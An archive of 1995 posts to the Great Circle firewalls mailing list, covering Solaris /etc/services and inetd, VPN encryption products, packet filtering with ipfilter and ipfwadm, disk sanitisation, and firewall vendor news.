10:51:18 -0700 Received: (smap@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id KAA00474 for ; Fri, 4 Aug 1995 10:51:14 -0700 From: mulligan@future.incog.com Received: from ns.incog.com(199.190.177.251) by miles via smap (V1.3) id sma000416; Fri Aug 4 10:50:10 1995 Received: from coslabs.incog.com by ns.incog.com (8.6.10/94082501) id KAA20480; Fri, 4 Aug 1995 10:32:13 -0700 Received: from future.incog.com by coslabs.incog.com (5.x/SMI-SVR4) id AA17683; Fri, 4 Aug 1995 11:30:53 -0600 Received: from future (localhost) by future.incog.com (5.x/SMI-SVR4) id AA00549; Fri, 4 Aug 1995 11:30:52 -0600 Message-Id: <9508041730.AA00549@future.incog.com> To: Doug Hughes Cc: dannyc@gmap.leeds.ac.uk, firewalls@greatcircle.com Subject: Re: /etc/services on Solaris Reply-To: mulligan@incog.com In-Reply-To: Your message of "Thu, 03 Aug 1995 12:35:39 CDT." Date: Fri, 04 Aug 1995 11:30:52 -0600 Sender: firewalls-owner@GreatCircle.COM Precedence: bulk > >I'm inclined to take all of these out. I'm slighly wary as to whether I'm > >going to shoot myself in the foot by doing so however, as I don't really > >know what half of these do! We don't have any need for X.400 mail; I'm > >not running a printer or NFS from my firewall either. And needless to > >say I'm not running Ingres on it!!! Anyone comment upon whether I should > >keep any of these ? > > There's no need to take them out. Taking them out of /etc/services > doesn't mean anything other than you can't resolve a name to port > number pair. In my opinion, you would be doing yourself a disservice > if it ever became necessary to figure out what a service was when > you were being probed on that port. > Instead, why not set up something that listens on these services > ports and reports the access if you know that no legitimate traffic > could possibly come on these ports? Actually taking entries out of the /etc/services file on Solaris does do something. It means that you can't start a service on that port from inetd. Inetd will only use a service name (not a port number) in the first (service-name) field. This name must be listed in the /etc/services file or in a NIS or NIS+ map if so configured. geoff From firewalls-owner Fri Aug 4 12:05:36 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id LAA00931 for firewalls-outgoing; Fri, 4 Aug 1995 11:01:28 -0700 Received: (smap@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id LAA00896 for ; Fri, 4 Aug 1995 11:01:19 -0700 Received: from snm.snm.com(199.35.155.1) by miles via smap (V1.3) id sma000756; Fri Aug 4 11:00:43 1995 Received: from gypsy.snm.com (gypsy.snm.com [199.35.155.2]) by snm.com (8.6.9/8.6.9) with SMTP id NAA26012; Fri, 4 Aug 1995 13:54:54 -0400 Date: Fri, 4 Aug 1995 13:52:39 -0400 (EDT) From: "David C. Blankenhorn" To: Steve Lodin cc: Firewalls@GreatCircle.COM Subject: Re: Virtual Private Network Enabling Technologies In-Reply-To: <9508031420.ZM16768@kocrsw26.delcoelect.com> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: firewalls-owner@GreatCircle.COM Precedence: bulk I know of a couple of commercial products that provide this sort of coverage. TIS's Gauntlet http://www.tis.com/ Raptor's Eagle http://www.raptor.com/ Sun's SunScreen http://www.sun.com/ I'm sure there are others. Of the three, I have only worked with the Raptor product for securing a connection between a PC on a public ISP and a protected network. This is also suppossed to be able to connect protected LANs, but I haven't used it for this purpose ... yet. As for Gauntlet and SunScreen, I am not sure. However, Sun's propaganda makes it look like it would handle LAN to LAN very nicely (if you have a `Screen at each remote site $$$). Cheers, David C. Blankenhorn -=-=-=-=-=-=-=-=-=-=-=-=-=- Smoke N' Mirrors -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- (703) 318-1440 1165 Herndon Parkway #200 david@snm.com - Services For Systems Integration - Herndon, VA 22070 On Thu, 3 Aug 1995, Steve Lodin wrote: > > A couple of weeks ago we had a discussion about virtual private networks > running on top of the Internet. Does anyone have a list or web site with the > enabling technologies to implement VPNs? I'll take any references including > white papers and commercial recommendations. From firewalls-owner Fri Aug 4 12:10:12 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id LAA02786 for firewalls-outgoing; Fri, 4 Aug 1995 11:34:01 -0700 Received: (smap@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id LAA02726 for ; Fri, 4 Aug 1995 11:33:50 -0700 Received: from quake.xnet.com(198.147.221.34) by miles via smap (V1.3) id sma002670; Fri Aug 4 11:33:03 1995 Received: from davesbbs.UUCP by quake.xnet.com (8.6.11/XNet-1.2R) with UUCP id NAA09813 for firewalls@greatcircle.com; Fri, 4 Aug 1995 13:31:53 -0500 Received: by davesbbs.com; Fri, 04 Aug 1995 10:35:37 Message-ID: <1246@davesbbs.com> Reply-To: dave@davesbbs.com (Dave) To: firewalls@greatcircle.com Date: Fri, 04 Aug 1995 10:35:37 Subject: Mailing List From: dave@davesbbs.com (Dave) Sender: firewalls-owner@GreatCircle.COM Precedence: bulk My system is receiving message from your mailing list. I Emailed you about this before and you sent me this instruction on how to remove it. However I have no idea what the name of this mailing list is or how to remove it. I made several attempts to remove it but it jus told me I didn't something about an invalid name. Whatever mailing list I am on is cluttering up my Email database with unaddressed messages and causing problems with my system. Is there any way you could remove it for me? I never joined any mailing lists so I have a feeling one of the users might have. However I have no way of knowing who and can't seem to find any info about this. I would appreciate any help you can give me in this matter. Thanks, David Smith This has been an D A V E ' S P L A C E VirtualNET @1334607 OFFICIAL EMAIL (334) 213-0554 24 hours FidoNET 1:375/201 written at... @davesbbs.com ACNET 244:300/1 *CC: firewalls-owner @greatcircle.com Internet *CC: firewalls @greatcircle.com Internet *CC: firewalls_owner @greatcircle.com Internet From firewalls-owner Fri Aug 4 12:10:33 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id KAA00403 for firewalls-outgoing; Fri, 4 Aug 1995 10:49:21 -0700 Received: (smap@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id KAA00369 for ; Fri, 4 Aug 1995 10:49:14 -0700 Received: from mwunix.mitre.org(128.29.154.1) by miles via smap (V1.3) id sma000353; Fri Aug 4 10:48:19 1995 Received: from smiley.sit (smiley.mitre.org [128.29.140.20]) by mwunix.mitre.org (8.6.10/8.6.4) with SMTP id NAA00207; Fri, 4 Aug 1995 13:47:07 -0400 Received: from [128.29.140.130] (mckenney-mac) by smiley.sit (4.1/SMI-4.1) id AA09134; Fri, 4 Aug 95 13:45:14 EDT Date: Fri, 4 Aug 95 13:45:13 EDT Message-Id: Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii" To: "Steve Lodin" From: mckenney@smiley.mitre.org (Brian W. McKenney) Subject: Re: Virtual Private Network Enabling Technologies Cc: Firewalls@GreatCircle.COM Sender: firewalls-owner@GreatCircle.COM Precedence: bulk The following products are able to encrypt network traffic based on source/destination address. Some are also able to encrypt based on the type of network service (port). As a result, sites could create a Virtual Private Network (VPN) on the Internet. Note that one would need two boxes in order to provide for site-to-site encryption over the Internet. ++If your product is missing, please let me know. Products are: ANS InterLock Service - Supports optional DES software. Brimstone Firewall Product Milkyway Black Hole - Supports modified (proprietary) DES algorithm (DES++). Cisco Systems/Cylink - Software solution (part of Cisco operating system) later this calendar year, hardware board to follow. Checkpoint Firewall-1 - Encryption support planned for future release. Hughes NetLOCK - Supports DES and cXOR. LSLI's Portus Firewall IRE - Available later this calendar year. KarlBrouter - Supports software DES. Network Systems Corp. (NSC) - Security Router offers encryption using IDEA, DES, Triple DES, and high speed proprietary algorithms. Morningstar EXPRESS Router - Supports DES. Motorola Network Encryption System (NES) Raptor Systems - Will be offering DES encryption package. Semaphore Communications - Network Encryption Unit (NEU), supports DES. swIPe - Publicly available. Sun Sunscreen SPF-100. - Supports multiple encryption algorithms. TIS Gauntlet 3.0 - Supports software DES option and hardware DES board. Includes resellers of Gauntlet. (Includes licensed Gauntlet products) UUNET LanGuardian - Combination of hardware and software DES. From firewalls-owner Fri Aug 4 12:30:42 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id MAA04714 for firewalls-outgoing; Fri, 4 Aug 1995 12:22:14 -0700 Received: (smap@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id MAA04635 for ; Fri, 4 Aug 1995 12:22:04 -0700 Received: from dg-rtp.rtp.dg.com(128.222.1.2) by miles via smap (V1.3) id sma004605; Fri Aug 4 12:21:27 1995 Received: from wellspring.us.dg.com by dg-rtp.dg.com (5.4R2.01/dg-rtp-v02) id AA16999; Fri, 4 Aug 1995 15:19:55 -0400 Received: from immis184 by wellspring.us.dg.com (5.4.1/dg-gens08) id AA20427; Fri, 4 Aug 1995 15:19:44 -0400 Message-Id: <9508041919.AA20427@wellspring.us.dg.com> Comments: Authenticated sender is From: "Jim Carroll" Organization: Data General (Canada) Inc. To: firewalls@greatcircle.com Date: Fri, 4 Aug 1995 15:18:50 -0500 Subject: InfoSec policies made easy? Reply-To: jcarroll@wellspring.us.dg.com Priority: normal X-Mailer: Pegasus Mail for Windows (v2.01) Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Thought this might be relevant, as this topic comes up from time to time. Feel free to comment. Policies aren't my forte, so please direct your responses to the list. I was cleaning up around my desk when I came across a promo entitled "Information Security Policies Made Easy". Dang near forgot about this. I'll forward noteworthy points for comment: - 600+ policies with diskette (PC/Mac) - authored by Charles Cresson Wood - abbr. TOC: - Management Summary - Policy Development Instructions - Specific Policies - Logical Security - Software Security - Software Development and Change Control - Data Security - Communications Security - Managerial Security - Administrative Security - Personnel Security - Organizataional Structure - Physical Security - Physical Access Security - Comprehensive List of Information Security Standards - Information Security Policy References - Brief Information Security Policy Statement - Appendices Then there's a sniplet from LAN Times (Dec.9/91). Also, the usual blessings from important people who have a lot at stake. The price is (or at least *was*) US$495. If the general feeling is a positive one, I'll post The Gory Commercial Details. :P -- Jim Carroll - jcarroll@wellspring.us.dg.com ... the usual disclaimers ... ## The more I learn, the less I know. ## ## Eventually I'll know everything about nothing. ## From firewalls-owner Fri Aug 4 12:43:35 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id KAA00402 for firewalls-outgoing; Fri, 4 Aug 1995 10:49:20 -0700 Received: (smap@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id KAA00368 for ; Fri, 4 Aug 1995 10:49:14 -0700 Received: from edison.eng.auburn.edu(131.204.10.13) by miles via smap (V1.3) id sma000357; Fri Aug 4 10:49:11 1995 Received: from netman.eng.auburn.edu (20663@netman.eng.auburn.edu [131.204.12.24]) by edison.eng.auburn.edu (8.6.12/8.6.4) with ESMTP id MAA22888; Fri, 4 Aug 1995 12:47:54 -0500 From: Doug Hughes Received: from localhost (doug@localhost) by netman.eng.auburn.edu (8.6.4/8.6.4) id MAA29808; Fri, 4 Aug 1995 12:47:51 -0500 Date: Fri, 4 Aug 1995 12:47:51 -0500 Subject: Re: /etc/services on Solaris To: mulligan@incog.com Cc: firewalls@greatcircle.com Message-Id: In-Reply-To: <9508041730.AA00549@future.incog.com> Sender: firewalls-owner@GreatCircle.COM Precedence: bulk >> There's no need to take them out. Taking them out of /etc/services >> doesn't mean anything other than you can't resolve a name to port >> number pair. In my opinion, you would be doing yourself a disservice >> if it ever became necessary to figure out what a service was when >> you were being probed on that port. >> Instead, why not set up something that listens on these services >> ports and reports the access if you know that no legitimate traffic >> could possibly come on these ports? > >Actually taking entries out of the /etc/services file on Solaris does do >something. It means that you can't start a service on that port from >inetd. > >Inetd will only use a service name (not a port number) in the first >(service-name) field. This name must be listed in the /etc/services >file or in a NIS or NIS+ map if so configured. > > geoff I had assumed that they had already been extracted from inetd and that the services was just an extra measure. (That's what I would do, extract out of inetd.) After all, if you're running something like NIS or NIS+, taking them out of /etc/services really does nothing at all. I still think setting a trap is a better alternative than complete removal. That way you KNOW you're being probed. PS - I've updated the source for klaxon to handle both tcp and udp and syslog any connection attempts. For relevant information see http://www.eng.auburn.edu/users/doug/second.html It does not handle rpc/tli stuff yet. -- ____________________________________________________________________________ Doug Hughes Engineering Network Services System/Net Admin Auburn University doug@eng.auburn.edu "Real programmers use cat > file.as" From firewalls-owner Fri Aug 4 12:51:54 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id LAA03766 for firewalls-outgoing; Fri, 4 Aug 1995 11:58:02 -0700 Received: (smap@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id LAA03750 for ; Fri, 4 Aug 1995 11:57:59 -0700 Received: from mycroft.greatcircle.com(198.102.244.35) by miles via smap (V1.3) id sma003744; Fri Aug 4 11:57:02 1995 Received: by mycroft.GreatCircle.COM (8.6.10/SMI-4.1/Brent-950602) id LAA28426; Fri, 4 Aug 1995 11:51:12 -0700 Received: from beach.sctc.com(192.55.214.50) by mycroft via smap (V1.3mjr) id sma028424; Fri Aug 4 11:50:59 1995 Received: from beach.sctc.com (daemon@localhost) by beach.sctc.com (8.6.12/8.6.12) with ESMTP id OAA17946 for ; Fri, 4 Aug 1995 14:00:13 -0500 Received: from spirit.sctc.com (spirit.sctc.com [172.17.192.76]) by beach.sctc.com (8.6.12/8.6.12) with ESMTP id OAA17940 for ; Fri, 4 Aug 1995 14:00:13 -0500 Received: from shade.sctc.com (shade.sctc.com [172.17.192.48]) by spirit.sctc.com (8.6.12/8.6.10) with ESMTP id NAA00260 for ; Fri, 4 Aug 1995 13:55:21 -0500 Received: (from smith@localhost) by shade.sctc.com (8.6.12/8.6.9) id NAA10916; Fri, 4 Aug 1995 13:55:20 -0500 Date: Fri, 4 Aug 1995 13:55:20 -0500 From: Rick Smith Message-Id: <199508041855.NAA10916@shade.sctc.com> To: firewalls@greatcircle.com Subject: Re: the ongoing debate.. Newsgroups: security.firewalls References: <9508020323.AA02983@tis.com> Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Marcus writes: > If my machine were the launch console for H-bombs I'd >strip it to a point of beyond uselessness, to secure it! :) For what it's worth, I've talked to nuclear controls people about assurance, comparing it to our experience with A1 assurance processes for trusted system development. They have us beat, for sure. Of course, they're sending exactly *ONE* message with very high assurance, and that changes the texture of the problem a bit. Rick. smith@sctc.com secure computing corporation From firewalls-owner Fri Aug 4 13:00:53 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id MAA05837 for firewalls-outgoing; Fri, 4 Aug 1995 12:46:28 -0700 Received: (smap@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id MAA05793; Fri, 4 Aug 1995 12:46:21 -0700 Received: from nsco.network.com(129.191.1.1) by miles via smap (V1.3) id sma005779; Fri Aug 4 12:46:02 1995 Received: from mnbp.network.com (ushub.network.com) by nsco.network.com (4.1/1.34) id AA28484; Fri, 4 Aug 95 15:03:42 CDT Received: by mnbp.network.com with Microsoft Mail id <3022786F@mnbp.network.com>; Fri, 04 Aug 95 14:43:43 CDT From: Craig McLellan To: firewalls-owner , firewalls Subject: RE: Sparc2 as a 3-way packet filter? Date: Fri, 04 Aug 95 14:43:00 CDT Message-Id: <3022786F@mnbp.network.com> Encoding: 32 TEXT X-Mailer: Microsoft Mail V3.0 Sender: firewalls-owner@GreatCircle.COM Precedence: bulk I'd love to know what performance you get out of this?? RGRDS....clm ---------- Subject: Sparc2 as a 3-way packet filter? Date: Thursday, August 03, 1995 1:57PM Hi, all: I'm looking into converting an idle Sparc-2 with 3 Ethernet interfaces into a packet-filtering firewall/router connecting 3 local nets for IP traffic only. Buying more hardware is not an option. The 3 networks are: a DMZ with our Internet link, another router and a bastion host; a buffer net with routers to multiple mutually suspicious clients resources shared between the client and our engineers (i.e., NFS servers); and the internal company LAN with <50 heterogeneous hosts. No traffic will pass directly from one external net to another, or to the internal net, only to servers in the buffer net or the DMZ bastion host. We will control all the "edge" routers on the buffer and DMZ nets. I've picked up the ipfilter package from Darren Reed, which looks to be pretty much what I think I need, and the newest version of screend I was able to find (dated April 1990). Any experiences with either of these two packages, or pointers to other SW solutions, would be appreciated. Thanks, +----------------------------------------------------------------------+ | Dan Murphy | CWA | Los Gatos, Calif | 408-358-1529 | dmurphy@cwa.com | +----------------------------------------------------------------------+ From firewalls-owner Fri Aug 4 13:37:33 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id LAA02225 for firewalls-outgoing; Fri, 4 Aug 1995 11:23:45 -0700 Received: (smap@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id LAA02183 for ; Fri, 4 Aug 1995 11:23:39 -0700 Received: from neptune.tis.com(192.94.214.96) by miles via smap (V1.3) id sma002176; Fri Aug 4 11:23:14 1995 Received: from relay.tis.com by neptune.TIS.COM id aa05077; 4 Aug 95 14:21 EDT Received: from sol.tis.com(192.33.112.100) by relay.tis.com via smap (g3.0.1) id xma021722; Fri, 4 Aug 95 14:12:14 -0400 Received: from sol.tis.com by tis.com (4.1/SUN-5.64) id AA18327; Fri, 4 Aug 95 14:19:11 EDT Message-Id: <9508041819.AA18327@tis.com> From: Frederick M Avolio X-Organization: Trusted Information Systems, Inc. X-Phone: +1 301 854 6889, +1 410 442 1673, FAX: +1 301 854 5363 To: Harold March Cc: Firewalls@greatcircle.com Subject: Re: MorningStar SecureConnect In-Reply-To: Your message of Fri, 04 Aug 95 12:23:54 -0400. <01HTOB1O6YF68Y5GXM@av410a.mtl.marconi.ca> Date: Fri, 04 Aug 95 14:19:05 -0400 Sender: firewalls-owner@GreatCircle.COM Precedence: bulk I won't enter into a debate about routers vs. application gateways vs. circuit gateways vs. hybrids (like DEC). ANy of you who have heard me speak, or know anything about the FWTK or the Gauntlet firewall know where I stand. If you believe that a filtering router is less secure then, yes, this will be a situation of marrying two different levels of security and so the overall safty of your network will drop the lower of the two. St. Paul, in his second letter to the Corinthians, (6:14) warns about being unequally joined like this, although my memory is a bit faulty and it is possible that he was not talking about security perimeters. I'd want a firewall between their network and mine... Fred > One of our remote sites wishes to obtain their own Internet connect > and wants to use a MorningStar SecureConnect "firewall". As far as > I can tell this is just a filtering router which does not give me > the "warm & fuzzies" since this can probably be compromised more > easily than the DEC SEAL firewall we have set up. Am I wrong to > think that this is going to backdoor our net or should I think about > firewalling off their site? ... From firewalls-owner Fri Aug 4 14:10:15 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id NAA08088 for firewalls-outgoing; Fri, 4 Aug 1995 13:27:18 -0700 Received: (smap@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id NAA08018 for ; Fri, 4 Aug 1995 13:27:08 -0700 Received: from engineer.mrg.uswest.com(144.163.254.27) by miles via smap (V1.3) id sma007969; Fri Aug 4 13:26:32 1995 Received: from msmgate.mrg.uswest.com by engineer.mrg.uswest.com with SMTP (1.38.193.4/16.2) id AA19960; Fri, 4 Aug 1995 14:25:20 -0600 Posted-Date: 4 Aug 1995 14:19:22 -0700 Received-Date: Fri, 4 Aug 1995 14:25:20 -0600 Message-Id: Date: 4 Aug 1995 14:19:22 -0700 From: "Rich Helton" Subject: To: firewalls@greatcircle.com X-Mailer: Mail*Link SMTP/MS 3.0.0 Sender: firewalls-owner@GreatCircle.COM Precedence: bulk list From firewalls-owner Fri Aug 4 14:23:57 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id LAA01179 for firewalls-outgoing; Fri, 4 Aug 1995 11:05:35 -0700 Received: (smap@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id LAA01097 for ; Fri, 4 Aug 1995 11:05:24 -0700 Received: from unknown(132.9.205.2) by miles via smap (V1.3) id sma001064; Fri Aug 4 11:04:48 1995 Received: from cs28-1.ellsworth.af.mil by ns.ellsworth.af.mil with SMTP (5.59/25-eef) id AA02025; Fri, 4 Aug 95 12:02:30 MDT Received: by cs28-1.ellsworth.af.mil with Microsoft Mail id <30226D6B@cs28-1.ellsworth.af.mil>; Fri, 04 Aug 95 11:56:43 PDT From: "Tucker, R., SrA, 28CS/SCSNS" To: Scott Barman Cc: "'firewalls-owner'" Subject: RE: Sanitizing SCSI disks Date: Fri, 04 Aug 95 11:57:00 PDT Message-Id: <30226D6B@cs28-1.ellsworth.af.mil> Encoding: 61 TEXT X-Mailer: Microsoft Mail V3.0 Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Because of magnetic remanence. I'm not sure how much you're familiar about how info gets written to disks, so please excuse me if you already know how this works: A small postive or negative current gets sent to the disk through the heads, charging the surface of the disk. Like ALL electrical currents, it flows in a wave pattern (frequency). The overwrite also flows in the same wave pattern, BUT NOT IN THE EXACT LOCATION AS THE ORIGINAL WAVE PATTEERN. Approximately 40% of the waves match after the first overwrite, leaving about 60% you could still bring back, provided you have the right software (some cases hardware is also necessary...I'm not the REAL expert on this, but I have seen how OSI does this.) I forget the actual algorythm on how much gets erased at each pass, but I do remember on the chart that after the first pass, approx. 60% could still be recovered, and it went all the way down to after the 99th pass, approx. .06% could still be recovered. The algorythm is different depending on what media you're sanitizing (as well as about 50 other different factors), but the above figures are for hard disks. Wipedisk DOES overwrite bad sectors, so they're not a problem as long as you're using it. (There used to be another program approved for sanitizing, I can't remember the name, but it was a M$ product, that lost it's approval because it didn't overwrite bad sectors. Look through your APDL around the April - June 93 time frame in the Products no longer approved section, if you're curious.) However, if you have a CRASHED Hard Disk, then you'll have to destroy it, since there's no way to ensure the heads are actually doing anything to the disk. ANother thing you can do, if it's possible to separate your disk (the little case with the platters) from the controller board (or anything else you don't want zapped) is to run it through a degausser. Now on this one you'll have to look up the length of time, Oehrsteds (sp?), and for what coercivity, etc. as they change from HD to HD. Glad I can finally help someone out on this list. :*) Have a good one... SrA Tucker ---------- From: Scott Barman To: Tucker, R., SrA, 28CS/SCSNS Subject: RE: Sanitizing SCSI disks Date: Friday, August 04, 1995 12:53PM On Fri, 4 Aug 1995, Tucker, R., SrA, 28CS/SCSNS wrote: > If you're a civilian, (and don't have to follow those requirements) just > overwrite with Wipedisk three times. If what's on there makes you *THAT* > paranoid, use Wipedisk 99 times. :*) Question: why three times? Wouldn't one do the trick? scott barman -- scott barman DISCLAIMER: I speak to anyone who will listen, scott@disclosure.com and I speak only for myself. barman@ix.netcom.com "Micro$oft and Windoze/NT will be the cause of the de-evolution of network security just as the original PC and BASIC was the cause of the de-evolution of programming." From firewalls-owner Fri Aug 4 14:35:24 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id MAA04053 for firewalls-outgoing; Fri, 4 Aug 1995 12:06:03 -0700 Received: (smap@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id MAA04034 for ; Fri, 4 Aug 1995 12:05:59 -0700 Received: from unknown(198.64.221.12) by miles via smap (V1.3) id sma004028; Fri Aug 4 12:05:44 1995 Received: from larry (nixon.merakusa.com [198.65.228.10]) by igate.merakusa.com (8.6.9/8.6.9) with SMTP id NAA01490 for ; Fri, 4 Aug 1995 13:42:37 -0500 Message-Id: <199508041842.NAA01490@igate.merakusa.com> X-Sender: lsb@igate.merakusa.com X-Mailer: Windows Eudora Version 2.1 Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii" Date: Fri, 04 Aug 1995 14:04:35 -0600 To: firewalls@GreatCircle.COM From: Larry Barras Subject: FW Developer's Consortium Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Here's an interesting snippet from the news. You can find the full article on various news or online services. <<<<< CARLISLE, Pa.--(BUSINESS WIRE)--Aug. 3, 1995--The National Computer Security Assn. (NCSA) has organized the Firewall Product Developers' Consortium (FWPD), to bring together the major vendors of network and Internet firewall products. The purpose of the consortium is to decrease confusion about computer firewall products, enhance quality, provide a common terminology and testing methodology and improve the ease of use and security of firewall products. ...[article snipped] >>>>>> Larry Barras Merak Projects, Inc. From firewalls-owner Fri Aug 4 14:38:45 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id OAA09306 for firewalls-outgoing; Fri, 4 Aug 1995 14:03:14 -0700 Received: (smap@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id OAA09283 for ; Fri, 4 Aug 1995 14:03:10 -0700 Received: from engineer.mrg.uswest.com(144.163.254.27) by miles via smap (V1.3) id sma009251; Fri Aug 4 14:01:39 1995 Received: from msmgate.mrg.uswest.com by engineer.mrg.uswest.com with SMTP (1.38.193.4/16.2) id AA20755; Fri, 4 Aug 1995 14:58:21 -0600 Posted-Date: 4 Aug 1995 14:54:58 -0700 Received-Date: Fri, 4 Aug 1995 14:58:21 -0600 Message-Id: Date: 4 Aug 1995 14:54:58 -0700 From: "Rich Helton" Subject: To: snmp@psi.com Cc: firewalls@greatcircle.com, host-conf@sol.cs.buchnell.edu, listserv@sunsite.unc.edu, snmp2@tis.com, socks@syl.dl.ncc.com X-Mailer: Mail*Link SMTP/MS 3.0.0 Sender: firewalls-owner@GreatCircle.COM Precedence: bulk lists From firewalls-owner Fri Aug 4 14:40:36 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id NAA06507 for firewalls-outgoing; Fri, 4 Aug 1995 13:00:30 -0700 Received: (smap@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id NAA06484 for ; Fri, 4 Aug 1995 13:00:26 -0700 Received: from unknown(205.164.126.161) by miles via smap (V1.3) id sma006477; Fri Aug 4 13:00:12 1995 Received: from [205.164.126.163] by rugrat.glyphic.com with smtp (Smail3.1.28.1 #1) id m0seSsy-000GxeC; Fri, 4 Aug 95 12:58 PDT X-Sender: markl@rugrat.glyphic.com Message-Id: Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii" Date: Sat, 5 Aug 1995 00:59:43 -0700 To: quito@constructa.cl (Francisco Javier cabezas) From: markl@glyphic.com (Mark Lentczner) Subject: Re: about ipfwadm in Linux Cc: Firewalls@GreatCircle.COM Sender: firewalls-owner@GreatCircle.COM Precedence: bulk >What are "the blocking rules", "the forwarding rules" and >"the IP accountting rules " ??? Blocking rules are applied to all packets that arrive on any interface and to packets generated locally. Forwarding rules are applied to packets that have passed the blocking rules and are being routed by the kernel to another machine on the net. Accounting rules are simply for counting packets and are applied just before delivering locally and just before transmitting on an interface (either due to forwarding or local packets). Graphically: interface --> Blocking --+--> Accouting --> local process | +--> Forwarding --> Accounting --> interface local process --> Blocking --> Accouting --> interface Note that the decision to forward is made after the blocking filter. In Linux, the kernel filter rules can be made interface specific, which enables one to create no-spoofing rules. There is also the Masqurade option, which lets you have a local net of IPs that never make it out to the Internet (see RFCs 1597 & 1627). In this case, masqurading takes places as: intf. --> Bl'king --+--+--> Acc'ting --> local process | | | +--> De-Masq. --> Fw'rding --> intf. | +--> Fw'rding --> Masq. --> intf. - Mark ------------------- Mark Lentczner Glyphic Technology 1209 Villa Street Mtn. View, CA 94041 415/964-5311 markl@glyphic.com http://www.glyphic.com/ From firewalls-owner Fri Aug 4 15:34:59 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id OAA11203 for firewalls-outgoing; Fri, 4 Aug 1995 14:36:49 -0700 Received: (smap@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id OAA11129 for ; Fri, 4 Aug 1995 14:36:39 -0700 Received: from relay2.uu.net(192.48.96.7) by miles via smap (V1.3) id sma011100; Fri Aug 4 14:36:16 1995 Received: from rssi by relay2.UU.NET with SMTP id QQzbjq22889; Fri, 4 Aug 1995 17:35:07 -0400 Received: from bass.rssi.com by rssi (4.1/SMI-4.1) id AA21825; Fri, 4 Aug 95 17:35:52 EDT Received: by bass.rssi.com with Microsoft Mail id <3022BA9F@bass.rssi.com>; Fri, 04 Aug 95 17:26:07 PDT From: Alex Sharpe To: "'firewalls-owner'" Subject: Firewalls for Dynamic Routing Date: Fri, 04 Aug 95 17:25:00 PDT Message-Id: <3022BA9F@bass.rssi.com> Encoding: 11 TEXT X-Mailer: Microsoft Mail V3.0 Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Anyone know of a Firewall product that does dynamic routing? In particular, we are looking for a product that will receive a packet and then from analyzing the content map it to another IP address only know withing the local enterprise. Alex Sharpe Rapid System Solutions Inc. (410) 312-1678 Alex.Sharpe@rssi.com From firewalls-owner Fri Aug 4 15:35:05 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id OAA12431 for firewalls-outgoing; Fri, 4 Aug 1995 14:50:43 -0700 Received: (smap@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id OAA12385 for ; Fri, 4 Aug 1995 14:50:34 -0700 Received: from mycroft.greatcircle.com(198.102.244.35) by miles via smap (V1.3) id sma012287; Fri Aug 4 14:50:07 1995 Received: by mycroft.GreatCircle.COM (8.6.10/SMI-4.1/Brent-950602) id OAA29202; Fri, 4 Aug 1995 14:44:17 -0700 Received: from beach.sctc.com(192.55.214.50) by mycroft via smap (V1.3mjr) id sma029200; Fri Aug 4 14:43:28 1995 Received: from beach.sctc.com (daemon@localhost) by beach.sctc.com (8.6.12/8.6.12) with ESMTP id QAA23254 for ; Fri, 4 Aug 1995 16:47:58 -0500 Received: from spirit.sctc.com (spirit.sctc.com [172.17.192.76]) by beach.sctc.com (8.6.12/8.6.12) with ESMTP id QAA23250 for ; Fri, 4 Aug 1995 16:47:57 -0500 Received: from shade.sctc.com (shade.sctc.com [172.17.192.48]) by spirit.sctc.com (8.6.12/8.6.10) with ESMTP id QAA06805; Fri, 4 Aug 1995 16:43:02 -0500 Received: (from smith@localhost) by shade.sctc.com (8.6.12/8.6.9) id QAA18193; Fri, 4 Aug 1995 16:43:01 -0500 Date: Fri, 4 Aug 1995 16:43:01 -0500 From: Rick Smith Message-Id: <199508042143.QAA18193@shade.sctc.com> To: firewalls@greatcircle.com Cc: smith@sctc.com Subject: Proofs of Security Properties Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Sorry I wasn't around for that terrific thread on MLS systems. I don't have much to add, but I'll quibble with Marcus' comments on proofs.. Ray 